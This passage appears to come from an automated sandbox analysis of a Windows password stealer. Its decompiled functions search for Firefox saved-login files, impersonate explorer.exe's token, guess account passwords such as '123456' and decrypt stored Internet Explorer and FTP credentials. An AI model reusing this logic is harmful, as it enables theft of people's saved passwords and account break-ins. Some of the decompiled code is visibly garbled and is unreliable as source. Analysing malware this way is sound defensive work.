Instruction Fuzzy Hash: 59F03075500518AEDF20CF50CC81BEABBB8EB14328F1041A2E598E52D0E7F99BC48F95

Uniqueness

Uniqueness Score: -1.00%

Function 00410630, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410630() {
				signed int _t5;
				long _t7;
				void* _t9;
				signed int _t10;

				L0:
				while(1) {
					L0:
					 *_t5 =  *_t5 + _t5;
					 *((intOrPtr*)(_t10 + 0xa)) =  *((intOrPtr*)(_t10 + 0xa)) + _t9;
					_t13 = _t5 % _t10 - 5;
					if(_t5 % _t10 == 5) {
						break;
					}
					L3:
					L1:
					_t7 = GetTickCount();
				}
				L2:
				E004105C3(_t7, _t13);
				ExitProcess(0); // executed
				goto ( *0x418148);
			}

0x00410630
0x00410630
0x00410631
0x00410631
0x00410633
0x0041063d
0x00410640
0x00000000
0x00000000
0x00410644
0x0041062f
0x0041062f
0x0041062f
0x00410642
0x00410646
0x0041064d
0x00410652

APIs

GetTickCount.KERNEL32 ref: 0041062F
ExitProcess.KERNEL32(00000000), ref: 0041064D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CountExitProcessTick
String ID:
API String ID: 232575682-0
Opcode ID: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
Instruction ID: 2fc71ade2e6a0a12d312a71b131b45268222faf8461f3848b8adab9be6287053
Opcode Fuzzy Hash: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
Instruction Fuzzy Hash: 02C0123021D24099C34157618D6A7C635120B92304F1580AFD0084449399A909D2862F

Uniqueness

Uniqueness Score: -1.00%

Function 00403FFB, Relevance: 1.5, APIs: 1, Instructions: 9
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00403FFB() {
				char _v402;
				char* _t2;

				_t2 =  &_v402;
				_push(_t2);
				_push(0x101); // executed
				L00410862(); // executed
				return _t2;
			}

0x00404004
0x0040400a
0x0040400b
0x00404010
0x00404016

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00404010

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
Instruction ID: 067aa5936d8b9ea5f708c86def76a5f3d8c81cd5d66f0ce82ea66d37eb38fb46
Opcode Fuzzy Hash: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
Instruction Fuzzy Hash: BDB0923161460826EA10A2968C479D6729C4744748F4005A13A5AD12C3EBE5AAC046EA

Uniqueness

Uniqueness Score: -1.00%

Function 00401011, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401011(void* __eax, void* __ecx) {
				void* _t2;
				void* _t5;

				_t2 = __eax;
				_push( *((intOrPtr*)(_t5 + 8)));
			}

0x00401011
0x00401011

APIs

73CEC0F0.OLE32(00000000,00000001,?), ref: 00401018

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
Instruction ID: 6a52ffac9a52bb75e61fdc74f829c3bacd20c516bd36067e767411562a370432
Opcode Fuzzy Hash: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
Instruction Fuzzy Hash: FFA0113228020030EA20AAA08803FC828020B20B8CF008002BB08280C0C0EA80E08A28

Uniqueness

Uniqueness Score: -1.00%

Function 004018CF, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018CF(intOrPtr _a4) {
				void* _t4;

				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
				return _t4;
			}

0x004018dd
0x004018e3

APIs

LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
Instruction ID: a02c1daf7142050e978c307995f6bc26c6b3feeb3ea3d743e520ab0cb6cfa48f
Opcode Fuzzy Hash: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
Instruction Fuzzy Hash: 81B092B124030826E250A649C803F5A728C9B50B8CF008022BB45A6282C8A8F9A041AD

Uniqueness

Uniqueness Score: -1.00%

Function 004018B8, Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018B8(void* _a4) {

				if(_a4 != 0) {
					LocalFree(_a4); // executed
				}
				return 0;
			}

0x004018bf
0x004018c4
0x004018c4
0x004018cc

APIs

LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
Instruction ID: 6f7800812ba96fbfdec46f28aef180318072ae253db4b629a7912724480db57a
Opcode Fuzzy Hash: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
Instruction Fuzzy Hash: 64C09B7210050C55C7017E25C905B9A7AD8575034CF40C1356605555B5D6B8D6E4C5D8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409832, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169
filestringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00409832(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
				struct _WIN32_FIND_DATAA _v322;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t52;
				void* _t54;
				CHAR* _t56;
				void* _t60;
				char* _t67;
				signed int* _t74;
				char** _t76;
				void* _t78;
				void* _t80;
				char* _t88;
				void* _t94;
				signed int* _t95;
				void* _t96;

				_t94 = __ecx;
				_v332 = 0;
				_t52 = _a16;
				if(_t52 == 0 ||  *_t52 == 0) {
					L31:
					return E004018B8(_v332);
				} else {
					_t54 = E004025A9(_a16);
					_t55 = _t54;
					if(_t54 != 0) {
						_t56 = E00401DF8(_t55, _a16, "*.*");
					} else {
						_t56 = E00401DF8(_t55, _a16, "\*.*");
					}
					_v332 = _t56;
					E004018E6( &_v322, 0x13e);
					_t60 = FindFirstFileA(_v332,  &_v322);
					_v328 = _t60;
					if(_t60 + 1 != 0) {
						do {
							_t95 =  &_v322;
							if(( *_t95 & 0x00000010) == 0) {
								_v336 =  &(_t95[0xb]);
								if( *0x416030 != 3) {
									_t64 = StrStrIA(_v336, "signons.sqlite");
									if(_t64 != 0) {
										E0040926B(_t94, _a4, E00401E4C(E00401DF8(_t64, _a16, "\\"), _t85, _v336), _a8, _a12);
										_t64 = E004018B8(_t86);
									}
									_push(_v336);
									L0041066A();
									if(_t64 < 2 ||  *((short*)( &(_v336[_t64]) - 2)) != 0x732e) {
										_push(StrStrIA(_v336, "signons.txt"));
										_push(StrStrIA(_v336, "signons2.txt"));
										_t67 = StrStrIA(_v336, "signons3.txt");
										_pop(_t96);
										_pop(_t94);
										_t64 = _t67;
										if(_t67 != 0 || _t96 != 0 || _t94 != 0) {
											goto L28;
										} else {
											goto L29;
										}
									} else {
										L28:
										E004094D8(_a4, E00401E4C(E00401DF8(_t64, _a16, "\\"), _t68, _v336), _a8, _a12);
										E004018B8(_t69);
										goto L29;
									}
								}
								_t88 = StrStrIA(_v336, "prefs.js");
								_t89 = _t88;
								if(_t88 != 0) {
									E0040406C(_a4, E00401E4C(E00401DF8(_t89, _a16, "\\"), _t90, _v336), 0xbeef0001);
									E004018B8(_t91);
								}
								goto L29;
							}
							_t74 =  &(_t95[0xb]);
							_push(_t74);
							_push(0x414f84);
							L00410712();
							if(_t74 != 0) {
								_t76 =  &( &_v322->cFileName);
								_push(_t76);
								_push(0x414f86);
								L00410712();
								if(_t76 != 0) {
									_t78 = E004025A9(_a16);
									_t79 = _t78;
									if(_t78 != 0) {
										_t80 = E00401DF8(_t79, _a16, 0);
									} else {
										_t80 = E00401DF8(_t79, _a16, "\\");
									}
									E00409832(_t94, _a4, _a8, _a12, E00401E4C(_t80, _t80,  &( &_v322->cFileName)));
									E004018B8(_t81);
								}
							}
							L29:
						} while (FindNextFileA(_v328,  &_v322) != 0);
						FindClose(_v328);
					}
					goto L31;
				}
			}

0x00409832
0x0040983b
0x00409848
0x0040984a
0x00409a9a
0x00409aa6
0x00409856
0x00409859
0x0040985e
0x00409860
0x00409879
0x00409862
0x0040986a
0x0040986a
0x0040987e
0x00409890
0x004098a2
0x004098a7
0x004098ae
0x004098b4
0x004098b4
0x004098c0
0x0040994c
0x00409959
0x004099b1
0x004099b3
0x004099d9
0x004099de
0x004099de
0x004099e3
0x004099e9
0x004099f1
0x00409a17
0x00409a28
0x00409a34
0x00409a39
0x00409a3a
0x00409a3b
0x00409a3d
0x00000000
0x00000000
0x00000000
0x00000000
0x00409a05
0x00409a47
0x00409a6b
0x00409a70
0x00000000
0x00409a70
0x004099f1
0x00409966
0x0040996b
0x0040996d
0x00409992
0x00409997
0x00409997
0x00000000
0x0040999c
0x004098c6
0x004098c9
0x004098ca
0x004098cf
0x004098d6
0x004098e3
0x004098e6
0x004098e7
0x004098ec
0x004098f3
0x004098fd
0x00409902
0x00409904
0x0040991a
0x00409906
0x0040990e
0x0040990e
0x0040993a
0x0040993f
0x0040993f
0x004098f3
0x00409a75
0x00409a87
0x00409a95
0x00409a95
0x00000000
0x004098ae

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004098A2
lstrcmpi.KERNEL32(00414F84,?), ref: 004098CF
lstrcmpi.KERNEL32(00414F86,?), ref: 004098EC
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A82
FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A95

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Strings

*.*, xrefs: 00409871
\*.*, xrefs: 00409862
signons3.txt, xrefs: 00409A29
signons.sqlite, xrefs: 004099A1
signons2.txt, xrefs: 00409A18
signons.txt, xrefs: 00409A07
prefs.js, xrefs: 0040995B

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: 7525ea44bccebc3fa6d54736fe600edbd5ed1fadf2fa58f406b5ffcdb9a9704d
Instruction ID: 67051825bcad8824e2b937691ec5a4406eb7b4ce862c3ffcbd0e68b0dcec7392
Opcode Fuzzy Hash: 7525ea44bccebc3fa6d54736fe600edbd5ed1fadf2fa58f406b5ffcdb9a9704d
Instruction Fuzzy Hash: A2513071941249BADF61BF61CC02EEE7A6AAF41308F1044BBB408711F2D6799ED0AE59

Uniqueness

Uniqueness Score: -1.00%

Function 00402CE7, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00402CE7(int* __eax, void* __eflags) {
				void* _v336;
				void* _v340;
				intOrPtr _v344;
				char _v604;
				long _v632;
				void* _v640;
				void* _v644;
				int _v648;
				int _v652;
				void* _t32;
				int _t35;
				char* _t39;
				int _t43;
				int _t46;
				int _t48;
				int _t51;
				int _t55;
				void* _t57;
				void* _t59;
				int _t61;

				_push(_t57);
				_push(0x402cff);
				asm("clc");
				if(__eflags < 0) {
					 *((intOrPtr*)(_t57 + 0x414aeb3d)) =  *((intOrPtr*)(_t57 + 0x414aeb3d)) + 1;
					 *__eax = __eax +  *__eax;
					__eflags =  *__eax;
					if( *__eax == 0) {
						L6:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x414aef;
						if( *0x414aef == 0) {
							goto L6;
						} else {
							__eflags =  *0x414b27;
							if( *0x414b27 == 0) {
								goto L6;
							} else {
								__eflags =  *0x414b2b;
								if( *0x414b2b != 0) {
									_t59 = 0;
									_v344 =  *0x414aeb();
									_v640 = 0x128;
									_t32 = CreateToolhelp32Snapshot(2, 0);
									__eflags = _t32 - 0xffffffff;
									if(_t32 != 0xffffffff) {
										_v644 = _t32;
										_t35 = Process32First(_v644,  &_v640);
										while(1) {
											__eflags = _t35;
											if(_t35 == 0) {
												break;
											}
											_t39 = StrStrIA( &_v604, "explorer.exe");
											__eflags = _t39;
											if(_t39 == 0) {
												L22:
												_t35 = Process32Next(_v644,  &_v640);
												continue;
											} else {
												_v648 = 0;
												_t43 =  *0x414aef(_v632,  &_v648);
												_t61 = _v648;
												__eflags = _t43;
												if(_t43 == 0) {
													goto L22;
												} else {
													__eflags = _t61 - _v344;
													if(_t61 != _v344) {
														goto L22;
													} else {
														_t46 = OpenProcess(0x2000000, 0, _v632);
														__eflags = _t46;
														if(_t46 == 0) {
															goto L22;
														} else {
															_v340 = _t46;
															_t48 = OpenProcessToken(_v340, 0x201eb,  &_v336);
															__eflags = _t48;
															if(_t48 == 0) {
																CloseHandle(_v340);
																goto L22;
															} else {
																_t51 = ImpersonateLoggedOnUser(_v336);
																__eflags = _t51;
																if(_t51 == 0) {
																	CloseHandle(_v336);
																	CloseHandle(_v340);
																	goto L22;
																} else {
																	_t59 = _t59 + 1;
																	_v652 = 0;
																	_t55 =  &_v652;
																	_push(_t55);
																	_push(0xf003f);
																	L004107E4();
																	__eflags = _t55;
																	if(_t55 == 0) {
																		__eflags = _v652;
																		if(_v652 != 0) {
																			_push(_v652);
																			_pop( *0x414869);
																		}
																	}
																}
															}
														}
													}
												}
											}
											break;
										}
										CloseHandle(_v644);
									}
									return _t59;
								} else {
									goto L6;
								}
							}
						}
					}
				} else {
					return __eax;
				}
			}

0x00402cf0
0x00402cf5
0x00402cfa
0x00402cfb
0x00402cfe
0x00402d04
0x00402d04
0x00402d06
0x00402d23
0x00402d23
0x00402d27
0x00402d08
0x00402d08
0x00402d0f
0x00000000
0x00402d11
0x00402d11
0x00402d18
0x00000000
0x00402d1a
0x00402d1a
0x00402d21
0x00402d28
0x00402d30
0x00402d33
0x00402d41
0x00402d46
0x00402d49
0x00402d4f
0x00402d62
0x00402d67
0x00402d67
0x00402d69
0x00000000
0x00000000
0x00402d7b
0x00402d80
0x00402d82
0x00402e4b
0x00402e58
0x00000000
0x00402d88
0x00402d88
0x00402d9f
0x00402da5
0x00402dab
0x00402dad
0x00000000
0x00402db3
0x00402db3
0x00402db6
0x00000000
0x00402dbc
0x00402dce
0x00402dce
0x00402dd0
0x00000000
0x00402dd2
0x00402dd2
0x00402de1
0x00402de7
0x00402de9
0x00402e46
0x00000000
0x00402deb
0x00402dee
0x00402df4
0x00402df6
0x00402e34
0x00402e3c
0x00000000
0x00402df8
0x00402df8
0x00402df9
0x00402e03
0x00402e09
0x00402e0a
0x00402e0f
0x00402e14
0x00402e16
0x00402e18
0x00402e1f
0x00402e21
0x00402e27
0x00402e27
0x00402e1f
0x00402e2d
0x00402df6
0x00402de9
0x00402dd0
0x00402db6
0x00402dad
0x00000000
0x00402d82
0x00402e68
0x00402e68
0x00402e71
0x00000000
0x00000000
0x00000000
0x00402d21
0x00402d18
0x00402d0f
0x00402cfd
0x00402cfd
0x00402cfd

Strings

explorer.exe, xrefs: 00402D6F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: explorer.exe
API String ID: 0-3187896405
Opcode ID: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
Instruction ID: 6cf2bdf8de8470b1e15b5c95fcd56135633905720b215610431ce2b02da368ac
Opcode Fuzzy Hash: 218728443306cc9d00ae8efdbf020c82e4af88c1d60a6babb47cb0d0ca7da1f5
Instruction Fuzzy Hash: F0313930A40208AADF229B61CD49BEE7BB4AB44344F1044B7E105B11E1DBB99FD5DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041032D, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041032D(char* __eax, void* __ecx, void* __eflags) {
				void* _v64;
				CHAR* _v68;
				char _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				void* _v88;
				void* _v92;
				char _v96;
				char _v100;
				char _v104;
				void* __ebx;
				void* __edi;
				char _t45;
				char _t47;
				int _t49;
				char _t50;
				char _t54;
				char _t57;
				char _t59;
				char _t65;
				void* _t68;
				char _t70;
				char _t71;
				CHAR* _t75;

				_t43 = __eax;
				_push(_t68);
				_push(_t75);
				_push(0x410343);
				asm("clc");
				if(__eflags < 0) {
					 *((intOrPtr*)(_t68 + 0x414b2b3d)) =  *((intOrPtr*)(_t68 + 0x414b2b3d)) + 1;
					 *__eax =  &(__eax[ *__eax]);
					__eflags =  *__eax;
					if( *__eax == 0) {
						L4:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x414b37;
						if( *0x414b37 != 0) {
							_t70 =  *0x4173a5; // 0x6349a8
							while(1) {
								_t71 = _t70;
								__eflags = _t71;
								if(__eflags == 0) {
									break;
								}
								_t45 = E00402BCA(_t43, __eflags);
								__eflags =  *0x4173a9;
								if( *0x4173a9 == 0) {
									L9:
									_v64 = 0;
									_t47 = LogonUserA( *(_t71 + 4), 0,  *(_t71 + 4), 2, 0,  &_v64);
									_t48 = _t47;
									__eflags = _t47;
									if(_t47 == 0) {
										_t49 = E00402A1D(_t48,  *(_t71 + 4));
										_v68 = _t49;
										_push( *(_t71 + 4));
										L0041066A();
										_t50 = LCMapStringA(0x400, 0x100,  *(_t71 + 4), _t49, _v68, _t49);
										__eflags = _t50;
										if(_t50 == 0) {
											L14:
											E004018B8(_v68);
											_t75 = "123456";
											L15:
											_v64 = 0;
											_t54 = LogonUserA( *(_t71 + 4), 0, _t75, 2, 0,  &_v64);
											__eflags = _t54;
											if(_t54 != 0) {
												goto L16;
											}
										} else {
											_v64 = 0;
											_t65 = LogonUserA( *(_t71 + 4), 0, _v68, 2, 0,  &_v64);
											__eflags = _t65;
											if(_t65 == 0) {
												goto L14;
											} else {
												E004018B8(_v68);
												goto L16;
											}
										}
									} else {
										L16:
										_v100 = 0x20;
										_v96 = 1;
										 *_t25 =  *(_t71 + 4);
										 *_t27 =  *((intOrPtr*)(_t71 + 8));
										_v84 = 0;
										_v80 = 0;
										_v76 = 0;
										_v72 = 0;
										_t57 =  &_v100;
										_push(_t57);
										_push(_v64);
										L00410868();
										__eflags = _t57;
										if(_t57 == 0) {
											_v104 = 0;
										} else {
											__eflags = _v72;
											if(_v72 != 0) {
												_push(_v72);
												_pop( *0x414869);
											}
											_v104 = 1;
										}
										_t59 = ImpersonateLoggedOnUser(_v64);
										_t60 = _t59;
										__eflags = _t59;
										if(__eflags != 0) {
											E0040FD60(_t60, _t71, _t75, __eflags);
											__eflags =  *0x414b23;
											if( *0x414b23 != 0) {
												RevertToSelf();
											}
											 *0x414869 = 0x80000001;
										}
										__eflags = _v104;
										if(_v104 != 0) {
											_push(_v72);
											_push(_v64);
											L0041086E();
										}
										CloseHandle(_v64);
									}
									asm("cld");
									_t43 = 0;
									asm("repne scasb");
									__eflags =  *_t75;
									if( *_t75 != 0) {
										goto L15;
									}
								} else {
									_push( *(_t71 + 4));
									_push( *0x4173a9);
									L00410712();
									_t43 = _t45;
									__eflags = _t45;
									if(_t45 != 0) {
										goto L9;
									} else {
									}
								}
								_t70 =  *_t71;
							}
							return 1;
						} else {
							goto L4;
						}
					}
				} else {
					return __eax;
				}
			}

0x0041032d
0x00410333
0x00410334
0x00410339
0x0041033e
0x0041033f
0x00410342
0x00410348
0x00410348
0x0041034a
0x00410355
0x00410355
0x0041035a
0x0041034c
0x0041034c
0x00410353
0x0041035b
0x004104f7
0x004104f7
0x004104f7
0x004104f9
0x00000000
0x00000000
0x00410366
0x0041036b
0x00410372
0x0041038b
0x0041038b
0x004103a2
0x004103a8
0x004103a8
0x004103aa
0x004103b4
0x004103b9
0x004103bc
0x004103bf
0x004103d6
0x004103db
0x004103dd
0x0041040a
0x0041040d
0x00410412
0x00410417
0x00410417
0x0041042c
0x00410432
0x00410434
0x00000000
0x00000000
0x004103df
0x004103df
0x004103f6
0x004103fc
0x004103fe
0x00000000
0x00410400
0x00410403
0x00000000
0x00410403
0x004103fe
0x004103ac
0x0041043a
0x0041043a
0x00410441
0x0041044b
0x00410451
0x00410454
0x0041045b
0x00410462
0x00410469
0x00410470
0x00410473
0x00410474
0x00410477
0x0041047c
0x0041047e
0x00410498
0x00410480
0x00410480
0x00410484
0x00410486
0x00410489
0x00410489
0x0041048f
0x0041048f
0x004104a2
0x004104a8
0x004104a8
0x004104aa
0x004104ac
0x004104b1
0x004104b8
0x004104ba
0x004104ba
0x004104c0
0x004104c0
0x004104ca
0x004104ce
0x004104d0
0x004104d3
0x004104d6
0x004104d6
0x004104de
0x004104de
0x004104e3
0x004104e4
0x004104eb
0x004104ed
0x004104ef
0x00000000
0x00000000
0x00410374
0x00410374
0x00410377
0x0041037d
0x00410382
0x00410382
0x00410384
0x00000000
0x00000000
0x00410386
0x00410384
0x004104f5
0x004104f5
0x00410507
0x00000000
0x00000000
0x00000000
0x00410353
0x00410341
0x00410341
0x00410341

Strings

123456, xrefs: 00410412, 00410426

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 123456
API String ID: 0-158520161
Opcode ID: 9e2e08eb7098b4a3e74be6c44804e6ce63f5975dc39676ed667ad46d90c9c269
Instruction ID: 162fa20a4eef0904e001b52781486bdd0e96aabe3a3ff4935987bad036a14f5f
Opcode Fuzzy Hash: 9e2e08eb7098b4a3e74be6c44804e6ce63f5975dc39676ed667ad46d90c9c269
Instruction Fuzzy Hash: 59515C70904208EFEF119FA1DD86BEDBBB5EB04304F148066E610B91E1C7F99AD4DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0040A557, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040A557(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				int _v2056;
				int _v2060;
				intOrPtr _v2064;
				char _v2068;
				char _v2072;
				char _v2076;
				void* _v2080;
				char _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				void* _t53;
				char* _t54;
				void* _t57;
				char* _t62;

				E0040A2A9(_a4,  &_v1028, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
				_v2068 = 0x10;
				_v2064 = 2;
				_v2060 = 0;
				_v2056 = 0;
				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
				if(_v2076 == 0 || _v2072 == 0) {
					return _t53;
				}
				_v2096 = 0xbeef0000;
				_push("Internet Explorer");
				_t54 =  &_v1028;
				_push(_t54);
				L00410712();
				if(_t54 == 0) {
					L5:
					_t57 = StrStrIA( &_v2052, "DPAPI: ");
					if(_t57 == 0) {
						_t57 = E0040A4E9(_v2096, _a12, _v2072, _v2076, _a16);
					} else {
						if( *0x414b43 != 0) {
							_push(_v2076);
							_pop( *_t29);
							_push(_v2072);
							_pop( *_t31);
							_t57 =  *0x414b43( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
							if(_t57 != 0) {
								E0040A4E9(_v2096, _a12, _v2088, _v2092, _a16);
								_t57 = LocalFree(_v2088);
							}
						}
					}
					L10:
					_push(_v2072);
					L0041079C();
					return _t57;
				}
				_v2096 = 0xbeef0001;
				_push("WininetCacheCredentials");
				_t62 =  &_v1028;
				_push(_t62);
				L00410712();
				if(_t62 == 0) {
					goto L5;
				}
				_v2096 = 0xbeef0002;
				_push("MS IE FTP Passwords");
				_t57 =  &_v1028;
				_push(_t57);
				L00410712();
				if(_t57 != 0) {
					goto L10;
				}
				goto L5;
			}

0x0040a56d
0x0040a58b
0x0040a590
0x0040a59a
0x0040a5a4
0x0040a5ae
0x0040a5e2
0x0040a5ec
0x0040a70f
0x0040a70f
0x0040a5ff
0x0040a609
0x0040a60e
0x0040a614
0x0040a615
0x0040a61c
0x0040a660
0x0040a671
0x0040a673
0x0040a6fe
0x0040a675
0x0040a67c
0x0040a682
0x0040a688
0x0040a68e
0x0040a694
0x0040a6b8
0x0040a6ba
0x0040a6d4
0x0040a6df
0x0040a6df
0x0040a6ba
0x0040a67c
0x0040a703
0x0040a703
0x0040a709
0x00000000
0x0040a709
0x0040a61e
0x0040a628
0x0040a62d
0x0040a633
0x0040a634
0x0040a63b
0x00000000
0x00000000
0x0040a63d
0x0040a647
0x0040a64c
0x0040a652
0x0040a653
0x0040a65a
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
Part of subcall function 0040A2A9: 73D5A680.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2EB

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
lstrcmpi.KERNEL32(?,Internet Explorer), ref: 0040A615
lstrcmpi.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
lstrcmpi.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
LocalFree.KERNEL32(?), ref: 0040A6DF
73D5A680.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A709

Strings

Internet Explorer, xrefs: 0040A609
DPAPI: , xrefs: 0040A660
WininetCacheCredentials, xrefs: 0040A628
MS IE FTP Passwords, xrefs: 0040A647

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$A680ByteCharMultiWide$CryptDataFreeLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 2102354470-3076635702
